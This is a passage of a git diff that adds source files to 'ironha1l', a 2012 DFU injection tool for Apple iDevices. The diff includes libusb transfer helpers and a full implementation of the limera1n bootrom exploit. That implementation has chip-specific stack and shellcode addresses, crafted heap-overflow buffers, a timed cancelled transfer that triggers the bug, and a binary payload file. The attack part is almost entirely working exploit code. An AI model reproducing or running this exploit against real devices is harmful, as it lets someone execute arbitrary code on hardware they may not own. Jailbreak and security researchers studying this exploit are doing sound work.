USB_HEADERS_bmRequestType, const unsigned USB_HEADERS_bRequest, const unsigned USB_HEADERS_wValue, const unsigned USB_HEADERS_wIndex, const unsigned timeout){ + + int ret_cmd; // Return values + + // Injection here + debug(L3, "[X] Sending Ctrl data...\n"); + + ret_cmd = libusb_control_transfer(dev_handle, USB_HEADERS_bmRequestType, USB_HEADERS_bRequest, USB_HEADERS_wValue, USB_HEADERS_wIndex, data, dataLen, timeout); // http://libusb.sourceforge.net/api-1.0/group__syncio.html#gab8ae853ab492c22d707241dc26c8a805 + + if (ret_cmd < 0) + debug(L1, "[-] FAILED! Unable to send ctrl.\n"); + else + debug(L3, "[X] SUCCESS! Ctrl sent.\n"); + + return ret_cmd; +} + +int injectBulk(libusb_device_handle *dev_handle, unsigned char * data, const unsigned dataLen, const unsigned endpoint, const unsigned timeout){ + + int ret_cmd; // Return values + int dataTranLen = 0; // data length sent for bulk transfer + + // Injection here + debug(L3, "[X] Sending Bulk data...\n"); + + ret_cmd = libusb_bulk_transfer(dev_handle, endpoint, data, dataLen, &dataTranLen, timeout); // http://libusb.sourceforge.net/api-1.0/group__syncio.html#gab8ae853ab492c22d707241dc26c8a805 + + if (ret_cmd < 0 && (unsigned int) dataTranLen != dataLen) + debug(L1, "[-] FAILED! Unable to send bulk.\n"); + else + debug(L3, "[X] SUCCESS! Bulk sent.\n"); + + return ret_cmd; +} + +int injectExploit(libusb_device_handle *dev_handle, unsigned char * data, const unsigned dataLen, const unsigned USB_HEADERS_bmRequestType, const unsigned USB_HEADERS_bRequest, const unsigned USB_HEADERS_wValue, const unsigned USB_HEADERS_wIndex, const unsigned timeout){ + + int ret_cmd; // Return values + char data_header[8+dataLen]; + + // LIBUSB Struct + struct libusb_transfer *transfer_command_out = NULL; + + transfer_command_out = libusb_alloc_transfer(0); + memset(data_header, 0x00, 8); + data_header[0]=(char)USB_HEADERS_bmRequestType; + data_header[1]=(char)USB_HEADERS_bRequest; + data_header[2]=(char)USB_HEADERS_wValue; + data_header[3]=(char)(USB_HEADERS_wValue>>8); + data_header[4]=(char)USB_HEADERS_wIndex; + data_header[5]=(char)(USB_HEADERS_wIndex>>8); + data_header[6]=(char)dataLen; + data_header[7]=(char)(dataLen>>8); + memcpy(data_header+8, data, dataLen); + libusb_fill_control_transfer(transfer_command_out, dev_handle, (unsigned char *) data_header, NULL, NULL, timeout); + //libusb_fill_control_transfer(transfer_command_out, dev_handle, (unsigned char *) data, NULL, NULL, 1); + + ret_cmd = libusb_submit_transfer(transfer_command_out); + + if (ret_cmd < 0) + debug(L1, "[-] FAILED! Unable to send exploit.\n"); + else + debug(L3, "[X] SUCCESS! Exploit sent.\n"); + + // Needed to wait some useconds for the exploit to be sent before we cancel the transfer + usleep(5 * 1000); + + // Kill the transfer before the end + libusb_cancel_transfer(transfer_command_out); + + return ret_cmd; +} + +int find_my_device(libusb_device **dev, int cnt, const unsigned idVendor, const unsigned idProduct, const unsigned idBus, char level){ // This function select the first iDevice found + + int i; + struct libusb_device_descriptor desc; + + for (i=0; ibNumInterfaces); + const struct libusb_interface *inter; + const struct libusb_interface_descriptor *interdesc; + const struct libusb_endpoint_descriptor *epdesc; + for(i=0; i<(int)config->bNumInterfaces; i++) { + inter = &config->interface[i]; + printf("Number of alternate settings: %d\n", inter->num_altsetting); + for(j=0; jnum_altsetting; j++) { + interdesc = &inter->altsetting[j]; + printf("Interface Number: %d\n", (int)interdesc->bInterfaceNumber); + printf("Number of endpoints: %d\n", (int)interdesc->bNumEndpoints); + for(k=0; k<(int)interdesc->bNumEndpoints; k++) { + epdesc = &interdesc->endpoint[k]; + printf("Descriptor Type: %d\n", (int)epdesc->bDescriptorType); + printf("EP Address: %d\n", (int)epdesc->bEndpointAddress); + } + } + } + printf("end\n"); + libusb_free_config_descriptor(config); +} diff --git a/libironha1l/libironha1l.h b/libironha1l/libironha1l.h new file mode 100644 index 0000000..ae3b805 --- /dev/null +++ b/libironha1l/libironha1l.h @@ -0,0 +1,56 @@ +//***************************************************************// +//** This file is part of ironha1l Tool Suite. **// +//** ironha1l, a DFU injector tool for iDevices. **// +//** **// +//** ********************************************************* **// +//** --------------- Updated: Oct-10-2012 -------------------- **// +//** ********************************************************* **// +//** **// +//** Author: Pascal CLEMENT aka Thireus **// +//** **// +//** http://ironha1l.thireus.com **// +//** http://blog.thireus.com **// +//** **// +//** ironha1l Tool Suite, **// +//** Copyright © 2012 Thireus. **// +//***************************************************************// +//**PLEASE REFER TO THE README FILE FOR ADDITIONAL INFORMATION!**// +//***************************************************************// + +#ifndef LIBIRONHA1L_H_ +#define LIBIRONHA1L_H_ + +#include "../common/common.h" +#include "../libusb_ironha1l/libusb/libusb.h" + +int select0r(libusb_context ** device); + +int destruct0r(libusb_context * device); + +libusb_device_handle * hoock3r(const unsigned idVendor, const unsigned idProduct, const unsigned idBus, libusb_context * device); + +libusb_device_handle * wash3r(libusb_device_handle * dev_handle); + +libusb_device_handle * inject0r(const char injection_mode, const unsigned idVendor, const unsigned idProduct, const unsigned idBus, libusb_context * device, unsigned char * data, const unsigned dataLen, const unsigned USB_HEADERS_bmRequestType, const unsigned USB_HEADERS_bRequest, const unsigned USB_HEADERS_Index, const unsigned USB_HEADERS_Language_ID, const unsigned timeout); + +int find_my_device(libusb_device **dev, int cnt, const unsigned idVendor, const unsigned idProduct, const unsigned idBus, char level); + +void printdev(libusb_device *dev); + +int injectCtrl(libusb_device_handle *dev_handle, unsigned char * data, const unsigned dataLen, const unsigned USB_HEADERS_bmRequestType, const unsigned USB_HEADERS_bRequest, const unsigned USB_HEADERS_Index, const unsigned USB_HEADERS_Language_ID, const unsigned timeout); + +int injectBulk(libusb_device_handle *dev_handle, unsigned char * data, const unsigned dataLen, const unsigned endpoint, const unsigned timeout); + +int injectExploit(libusb_device_handle *dev_handle, unsigned char * data, const unsigned dataLen, const unsigned USB_HEADERS_bmRequestType, const unsigned USB_HEADERS_bRequest, const unsigned USB_HEADERS_Index, const unsigned USB_HEADERS_Language_ID, const unsigned timeout); + +int injectFile(const char injection_mode, libusb_device_handle *dev_handle, unsigned char * dataFile, const unsigned dataLen, const unsigned USB_HEADERS_bmRequestType, const unsigned USB_HEADERS_bRequest, const unsigned USB_HEADERS_Index, const unsigned USB_HEADERS_Language_ID, const unsigned timeout); + +int injectReset(libusb_device_handle *dev_handle); + +int injectFinishReset(const unsigned idVendor, const unsigned idProduct, const unsigned idBus, libusb_context * device); + +unsigned getCPID(const unsigned idVendor, const unsigned idProduct, const unsigned idBus, libusb_context * device); + +int listDevices(); + +#endif /*LIBIRONHA1L_H_*/ diff --git a/limera1n/limera1n.c b/limera1n/limera1n.c new file mode 100644 index 0000000..5f89737 --- /dev/null +++ b/limera1n/limera1n.c @@ -0,0 +1,135 @@ +//***************************************************************// +//** This file is part of ironha1l Tool Suite. **// +//** ironha1l, a DFU injector tool for iDevices. **// +//** **// +//** ********************************************************* **// +//** --------------- Updated: Oct-10-2012 -------------------- **// +//** ********************************************************* **// +//** **// +//** Author: Pascal CLEMENT aka Thireus **// +//** **// +//** http://ironha1l.thireus.com **// +//** http://blog.thireus.com **// +//** **// +//** ironha1l Tool Suite, **// +//** Copyright © 2012 Thireus. **// +//***************************************************************// +//**PLEASE REFER TO THE README FILE FOR ADDITIONAL INFORMATION!**// +//***************************************************************// + +#include +#include +#include +#include +#include + +#include "limera1n.h" + +int limera1n_inject0r(const unsigned chip_id, const unsigned idBus, libusb_context * device, const char * limera1n_payload) { + + // limera1n vars + unsigned int i = 0; + unsigned char buf[0x800]; + unsigned int max_size = 0x24000; + unsigned int stack_address = 0x84033F98; + unsigned int shellcode_address = 0x84023001; + + // dev_handle + libusb_device_handle * dev_handle; + + // Injection data + char * data; + unsigned dataLen; // used to store data lengths + + //irecv_device_t device = g_syringe_device; + //irecv_client_t client = g_syringe_client; + + debug(L2, "[X] Initializing limera1n...\n"); + + if (chip_id == 8930) { + max_size = 0x2C000; + stack_address = 0x8403BF9C; + shellcode_address = 0x8402B001; + } + else if (chip_id == 8920) { + max_size = 0x24000; + stack_address = 0x84033FA4; + shellcode_address = 0x84023001; + } + + debug(L3, "[X] Resetting device counters.\n"); + //irecv_reset_counters(g_syringe_client); + // = irecv_control_transfer(client, 0x21, 4, 0, 0, 0, 0, 1000); + data = ""; + dataLen = 0x0; + dev_handle = inject0r(0x40|CTRL_OUT, idAPPLE, idDFU, idBus, device, (unsigned char *) data, (const unsigned) dataLen, 0x21, 0x4, 0x0, 0x0, 1000); // idVendor, idProduct, data, headers + + memset(buf, 0xCC, 0x800); + for(i = 0; i < 0x800; i += 0x40) { + unsigned int* heap = (unsigned int*)(buf+i); + heap[0] = 0x405; + heap[1] = 0x101; + heap[2] = shellcode_address; + heap[3] = stack_address; + } + + debug(L2, "[X] Sending chunk headers...\n"); + //irecv_control_transfer(client, 0x21, 1, 0, 0, buf, 0x800, 1000); + data = (char *) buf; + dataLen = 0x800; + inject0r(0xC0|CTRL_OUT, idAPPLE, idDFU, idBus, (libusb_context *)dev_handle, (unsigned char *) data, (const unsigned) dataLen, 0x21, 0x1, 0x0, 0x0, 1000); // idVendor, idProduct, data, headers + + memset(buf, 0xCC, 0x800); + for(i = 0; i < (max_size - (0x800 * 3)); i += 0x800) { + //irecv_control_transfer(client, 0x21, 1, 0, 0, buf, 0x800, 1000); + data = (char *) buf; + dataLen = 0x800; + inject0r(0xC0|CTRL_OUT, idAPPLE, idDFU, idBus, (libusb_context *)dev_handle, (unsigned char *) data, (const unsigned) dataLen, 0x21, 0x1, 0x0, 0x0, 1000); // idVendor, idProduct, data, headers + } + + debug(L2, "[X] Sending exploit payload...\n"); + //irecv_control_transfer(client, 0x21, 1, 0, 0, shellcode, 0x800, 1000); + data = (char *) limera1n_payload; + dataLen = 0x800; + inject0r(0xC0|CTRL_FILE_OUT, idAPPLE, idDFU, idBus, (libusb_context *)dev_handle, (unsigned char *) data, (const unsigned) dataLen, 0x21, 0x1, 0x0, 0x0, 1000); // idVendor, idProduct, data, headers + + debug(L2, "[X] Sending fake data...\n"); + memset(buf, 0xBB, 0x800); + + //irecv_control_transfer(client, 0xA1, 1, 0, 0, buf, 0x800, 1000); + data = (char *) buf; + dataLen = 0x800; + inject0r(0xC0|CTRL_IN, idAPPLE, idDFU, idBus, (libusb_context *)dev_handle, (unsigned char *) data, (const unsigned) dataLen, 0xA1, 0x1, 0x0, 0x0, 1000); // idVendor, idProduct, data, headers + +/* THIS SOLUTION ONLY WORKS FOR LINUX, NOT MACOS... USE injectExploit() INSTEAD! + //irecv_control_transfer(client, 0x21, 1, 0, 0, buf, 0x800, 10); + data = (char *) buf; + dataLen = 0x800; + inject0r(0xC0|CTRL_OUT, idAPPLE, idDFU, idBus, (libusb_context *)dev_handle, (unsigned char *) data, (const unsigned) dataLen, 0x21, 0x1, 0x0, 0x0, 1); // idVendor, idProduct, data, headers // 1 or 10 MILLISECONDES!!!!! We also store dev_handle, for timing issues +*/ + + data = (char *) buf; + dataLen = 0x800; + injectExploit(dev_handle, (unsigned char *) data, (const unsigned) dataLen, 0x21, 0x1, 0x0, 0x0, 1000); + + debug(L1, "[INFO] Next FAILED is part of the limera1n exploit ;)\n"); + + //debug("Executing exploit\n"); + //irecv_control_transfer(client, 0x21, 2, 0, 0, buf, 0, 1000); + data = (char *) buf; + dataLen = 0x0; + //inject0r(CTRL_OUT, idAPPLE, idDFU, idBus, device, (unsigned char *) data, (const unsigned *) dataLen, 0x21, 0x2, 0x0, 0x0, 1000); // idVendor, idProduct, data, headers + + inject0r(0xC0|CTRL_OUT, idAPPLE, idDFU, idBus, (libusb_context *)dev_handle, (unsigned char *) data, (const unsigned) dataLen, 0x21, 0x2, 0x0, 0x0, 1); // idVendor, idProduct, data, headers + + //injectCtrl(dev_handle, (unsigned char *) data, dataLen[1], 0x21, 0x2, 0x0, 0x0, 1000); + //libusb_release_interface(dev_handle, 0); // Release the claimed interface + + //irecv_reset(client); + + inject0r(0x80|RESET, idAPPLE, idDFU, idBus, (libusb_context *)dev_handle, NULL, 0x0, 0, 0, 0, 0, 0); + + debug(L2, "[X] SUCCESS! limera1n exploit sent!\n"); + + return 0; +} diff --git a/limera1n/limera1n.h b/limera1n/limera1n.h new file mode 100644 index 0000000..224106f --- /dev/null +++ b/limera1n/limera1n.h @@ -0,0 +1,27 @@ +//***************************************************************// +//** This file is part of ironha1l Tool Suite. **// +//** ironha1l, a DFU injector tool for iDevices. **// +//** **// +//** ********************************************************* **// +//** --------------- Updated: Oct-10-2012 -------------------- **// +//** ********************************************************* **// +//** **// +//** Author: Pascal CLEMENT aka Thireus **// +//** **// +//** http://ironha1l.thireus.com **// +//** http://blog.thireus.com **// +//** **// +//** ironha1l Tool Suite, **// +//** Copyright © 2012 Thireus. **// +//***************************************************************// +//**PLEASE REFER TO THE README FILE FOR ADDITIONAL INFORMATION!**// +//***************************************************************// + +#ifndef LIMERA1N_H_ +#define LIMERA1N_H_ + +#include "../libironha1l/libironha1l.h" + +int limera1n_inject0r(const unsigned chip_id, const unsigned idBus, libusb_context * device, const char * limera1n_payload); + +#endif /*LIMERA1N_H_*/ diff --git a/limera1n/limera1n.payload b/limera1n/limera1n.payload new file mode 100644 index 0000000000000000000000000000000000000000..e56134d1a8c78d1eaae148b3cc4956a4c1318fbc GIT binary patch literal 2048 zcmeH@&ui0Q9EZPe_M;UGt}1fg$ullOTZ-Wb!YZbm4@h142Kcpq~QDa(7shNrUWonbbu$A^x`OZ%22_vgsQ9sH% zD2CyxtUZeNzbbfQ{H6Lqp3*41-F5haNa1u3e~tT0<6JCJxC~;xEm+m&*Q360*yp*4 zek1A@y2bNR&mZ=iyojET`c?Efei?nvq3|NyiJ-)%!6ooHa4eYRli*qKY4Ctwz@36H ztE8V7bm24RaBJ`Q#=ttuuq-Q4svE4^G|}4|@e;CW4F+^6=9lFgYtUD+3i?4n<8f`| z%a%e^Oy}u$fk-_@^s`8mOXuiCndp%uda(Mp&(PZ((Iomqba47T_%Y5{P1;q+ylc+e zrsa@AI-GuHqnBC